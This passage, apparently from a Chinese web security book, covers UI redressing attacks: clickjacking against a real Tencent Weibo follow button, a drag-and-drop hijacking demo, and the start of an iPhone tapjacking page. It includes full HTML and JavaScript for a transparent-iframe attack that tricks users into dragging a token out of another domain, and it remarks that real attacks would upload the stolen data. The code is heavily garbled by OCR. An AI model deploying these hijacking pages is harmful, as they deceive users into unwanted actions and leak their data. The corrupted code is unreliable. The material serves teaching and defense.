我们可以使用这些函数模拟鼠标键盘的动作。表5-2是IPhone中的触屏(touch)函数。 表5-2触屏函数

函 数	说 明
touchstart	手指放在屏專上时麟发
Touchend	手指离开屏幕时触发
touchmove	手指在屏幕上移动时触发
touchcancel	系统"以取消touch耶件

在这些触屏移动设备中，同样可以使用透明层+iframe方法，然后配合触屏设备中自身 的API函数来发起触屏劫持攻击。

5.3界面操作劫持实例

本节将分别针对点击劫持、拖放劫持、触摸劫持给出真实的攻击实例。

5.3.1点击劫持实例

我们已经对点击劫持原理做了详细分析，接下来给出一个真实的点击劫持攻击实例一 腾讯微博“立即收听”按钮点击劫持攻击。这个攻击达到的效果是，用户在不知情的情况 下收听某用户。

这里以微博http://t.qq.com/xisigr为例做一个实验，如果你没有收听这个账号，那么 在你已登录腾讯微博的状态下浏览微博主页时，则会出现收听“立即收听”的按钮，如 图5-2所示，可以看到"立即收听”这个按钮，而且链接http://t.qq.com/xisigr可以被iframe 嵌套。

我们可以看到token的数值是0123456789。

B页面设计为：在小球的上而使用<iframe>标签加入隐藏层，用户单击小球后，按Ctrl+A 组合键或滑动鼠标操作实际上是选择了隐蔵层中的内容，这里就是http://192.168.10.101/Token.html中的内容。在海豚的嘴上方使用<div>标签加入隐蔵层。

完成拖放操作后，接卜来进行跨域操作，诱惑用户把-个域中<iframe>的内容拖放到 另个域的<div>中。当操作成功后，会把拖动的数据打印在页面上。完整的代码如下：

<html>

<head>

Drag and Drop Attack Demo

</title>

<style>

.IFrame_hidden{height: 50px; width: 50px; top:360px; left:365px; overflow:hidden;

filter: alpha(opacity=0); opacity:.0; position: absolute; ) .text_ areahidden{

height: 30px; width: 30px; top:180px; left:665px; border:Ipx solid black;

overflow:hidden; filter: alpha(opacity=0); opacity:.0;position: absolute;}

.ball{ top:350px; left: 350px; position: absolute; } .ball_l{ top:136px; left:640px; filter: alpha(opacity=0); opacity:.0; position:

absolute; }.Dolphin{

top:150px; left:600px; position: absolute; }.center{ margin-right: auto;margin-left:

auto; vertical-align:middle;text-align:center; margin-top:350px;}

</style>

<script>

function Init () ( //添加险听

var source = document.getElementById("source");

var target = document.getElementById("target");

i f (source.addEventListener) {

target. addEventListener ( Hdrop,' fDumplnfo, false);

} else (

target.attachEvent("ondrop", Dumpinfo);

)

}

function entities(s) {

var e = {

‘心：," ' r

• & f: * &',

,<f: '< 1 r

1>,

I；

return s ・replace(/【"&<>]/g,

function(m) (

return e[m];

})；

I

function Dumpinfo(event) (

showHide ball. call (this) ; //地面上的小球消失 showHide_ball_l. call (this) ; //海豚嘴上的小球出现 if (event.dataTransfer . types) { //Firefox 浏览器支持

var info = document.getElementByld (ninfoH);

info.innerHTML += "〈span style='color:#3355cc;font-size:12px1>° ♦ entities (event. dataTransfer. get Data (' text/html') ) + •'</span><br>

//在页面上打印出获取到的数据

} else { //IE浏览器支持

setTimeout("html()", 10);

-三二Web前端黑客技术掲萩°二"

function html () {.，

document ・getEiementByid(' target1).innerText

:rtarget') . innerHTML;「

/ - var \ info := document.. getElemeritByld ("info");

.■ .< S • J 4 . • . • ， .. ... • . X

T. .rt*

.・-W -■

=_. document .'getEiementByid*...'.

，.:info. innerHTML += H<span' s*yle =.' co 1 or-: # 3355cc'; font-size: 12px 1>'+

(document ；getElementById ( ' target • ) innerHTML) + M<7span><br>• *'; *

'•.」/«底面匕打印出*取莉的薮据*:""宀 一 "「‘I

- • . .   .. ・・，. .

function showHide frame()(

var IFramejl = .document.getEiementByid("I Frame 1H);.

.'-IFrame ^lVstyle 1 opacity 三 this ^checked ? .一"0三 5":.当0'!；

IFrame 1-style.filter

+ (this, checkedn50n: ••);

"progid:DXImageTransform.Microsoft.Alpha(opacity= 「.

~ • * - •乙• - — •--——嵐七••- - ••-

切.

.'-function .showHide-text () (''

var text;2_l' =. document-. getEiementByid (,,target,,X;._-.' text; -1. s t y 1 e. opac i t yt hi s .checked * ? "0 ：5" : "0";

—'text* 1-. styieff ilter 1 = ''progid: DXIrnageTransfo rm .Microsoft. Alpha： =_

(opacity^'L + -(this.checked ?-"50":

•. •二 、二 - 二・. —.•二一 一 —-

"0M) + ”)；”

function showHide ball () {。.

•var hide ball•

document ・getEiementByid("hide_ballM);

• hide.ball.style.opacity = "0 H

hide -ba 11. sty 1 e.. fil.ter = - "alpha (opacity=b) '' ;

jfunction ;show.Hide ball ' 1:( )；-{/..

：~ 2 hide^all^l. style ・ opacity

-.document-.getEiementByid (.?hide ball?"');..

hide ball' 1. style . filter "alpha (opacity=100) M;

}

function reload_text() (

document.getElementByld (''target") .value ='';

}

</script>

</head>

<body onload=,,Init () ; M>

<center>

<hl>

Drag and Drop Attack

</hl>

</center>

<img id=nhide_ballwsrc=ball.png class=wballl,>

<div id=wsource,,>

<iframe id=wIFrame_lwsrc=whttp://192.168.10.101/Token.html

"class=wIFrame_hiddenMscrolling=wnow>

</iframe>

</div>

<img src=Dolphin.jpg class=MDolphinw>

<div>

<img id=whide_ball_lMsrc=ball.png class=,1ball_ll,>

</div>

<div>

<div id=ntargetMclass=ntext_area_hiddenMcontented!table-Mtruew>

test

</div>

</div>

<div id=f,infoMstyle=wposition:absolute;background-color:#e0e0e0;fontweight : bold; top:600px;M>

</div>

<center>

游戏规则：-Ctrl + A"或滑动鼠标选中小球，然后把小球拖放到海豚的嘴上.

<br>

</center>

<br>

<br>

<div class=wcenter">

<center>

<center>

<input id=MshowHide_framentype=wcheckboxwοnclick=wshowHide_frame.call

(this);n

/>

<label for=,,showHide_frame">

Show the jacked I■-Frame

</label>

I

<input id= MshowHide_textHtype=wcheckboxMοnclick=°showHide_text.call(this);M

/>

<label for-MshowHide_textM>

Show the jacked Textarea

</label>

I

<input type=button value=MReplaywοnclick=nlocation.reload();reload_ text();H>

</center>

<br>

<br>

<b>

Design by

<a target«w_blankwhref«nhttp://hi.baidu,com/xisigrn>

xisigr

</a>

</b>

</center>

</div>

</body>

</html>

对于页面B,美工可以进一步优化以诱导用户进行拖放操作。从功能上还叫扩展，在 这个例子中只是象征性地把获取到的数据打印在页面匕实际攻击中，可以直接把获取的 数据进行上传并保存。

上述测试代码在IE 9.0和Firefbx 8.0浏览器中运行正常，大家可以发现在Firefox浏览 器中进行拖放的时候，浏览器会把拖放的内容以阴影的形式显示出来，这样欺骗起来就比 较困难了，因为用户可以看到你拖放的实际内容是什么。而在1E 9.0中拖放的时候，只会 出现一个小加号。可以看到发动拖放劫持攻击的难度还是比较高的，它需要有很多技巧和 互动操作。一方面，攻击者要设计漂亮的网页：另一方面，攻击者要和用户有大量的坯动， 以诱导用户在网页上进行拖拽操作。

5.3.3触屏劫持实例

在5.2.4节中，我们已经了解了 IPhone手机的屏幕区域设计，也掌握了触屏劫持中要 用到的技术要素。卜一面的触屏劫持实例仍以5.3.1节中的腾讯微博“立即收听”按钮为例进 行介绍，不同的是，这里的操作环境在IPhone设备上。

如图5-9所示，大家看到后是不是以为这是IPhone手机的桌面，而且桌面上收到一条 短信。如果你认为这是IPhone桌面，而且按照习惯去触摸冋复或关闭这个按钮，那么你就 己经被触屏劫持了。因为图5-9所示的是-个以IPhone桌面为背景的Web网页。当把网页 保存为524节中提到的以桌面浏览器形式打开时，网页就支持全屏显示了，以这种形式呈 现的网页更像是本地的原生态APP应用程序，使用户根本就分不清哪个是桌面，哪个是网 页。而当你触摸显示按钮后，实际上是触摸了其上方的腾讯微博“立即收听”按钮，如图 5-10所示。

图5-9伪装的IPhone背景+短信

完整的代码如下：

<html>

<head>

<title>iPhone Tapjacking Demo</title>

<meta name="viewport" content=Hwidth=320; initial-scale=l;

user-scalable=no;"/>

<meta name='tapple-mobile-web-app-capable,rcontent=HyesH/>

<meta name=napple-mobile-web-app-status-bar-stylencontent="black-

translucentM/>

<style>

body{

margin:0;

padding:0;

}